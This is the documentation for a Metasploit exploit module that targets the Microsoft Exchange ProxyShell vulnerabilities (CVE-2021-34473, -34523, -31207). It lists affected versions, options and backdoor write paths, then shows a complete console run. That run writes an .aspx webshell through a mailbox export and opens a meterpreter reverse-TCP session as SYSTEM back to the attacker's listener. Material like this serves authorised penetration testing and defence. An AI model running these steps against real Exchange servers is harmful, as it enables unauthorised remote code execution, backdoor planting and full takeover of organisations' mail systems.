Vulnerable Application
This module exploits a vulnerability in Microsoft Exchange Server that allows an attacker to bypass authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve RCE (Remote Code Execution).
By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
This vulnerability affects:
- Exchange 2013 CU23 < 15.0.1497.15
- Exchange 2016 CU19 < 15.1.2176.12
- Exchange 2016 CU20 < 15.1.2242.5
- Exchange 2019 CU8 < 15.2.792.13
- Exchange 2019 CU9 < 15.2.858.9
Verification Steps
- Start msfconsole
- Do: `use exploit/windows/http/exchange_proxyshell_rce`
- Do: `set RHOSTS [IP]`
- Do: `set EMAIL [EMAIL ADDRESS]`
- Do: `run`
Options
EMAIL
A known email address for this organization. This email address must belong to a user with privileges to access the Exchange Management Shell.
UseAlternatePath
Use the IIS root dir as alternate path. Default: false
Advanced Options
BackendServerName
Force the name of the backend Exchange server targeted. Default: Automatic
If not set, the automatic method uses an RPC call to detect the backend server FQDN. This is required because the Kerberos-authenticated SSRF can only be sent when the FQDN is known.
ExchangeBasePath
The base path where Exchange is installed. Default: C:\Program Files\Microsoft\Exchange Server\V15
ExchangeWritePath
The path where you want to write the backdoor. Default: owa\auth
You can, for example, set it to: ecp\auth
IISBasePath
The base path where IIS wwwroot directory is. Default: C:\inetpub\wwwroot
IISWritePath
The path where you want to write the backdoor. Default: aspnet_client
MapiClientApp
This is the MAPI client version sent in the request.
Scenarios
Exchange 2016 CU 19 on Server 2016
```
msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOSTS 192.168.159.42
RHOSTS => 192.168.159.42
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL smcintyre@exchg.lan
EMAIL => smcintyre@exchg.lan
msf6 exploit(windows/http/exchange_proxyshell_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-bpid95acq7e.exchg.lan
[*] Sending autodiscover request
[*] Server: cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan
[*] LegacyDN: /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre
[*] Sending mapi request
[*] SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
[*] Assigning the 'Mailbox Import Export' role
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200262 bytes) to 192.168.159.42
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.42:6787) at 2021-08-17 17:32:26 -0400
[*] Removing the mailbox export request
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 6
Meterpreter     : x64/windows
meterpreter >
```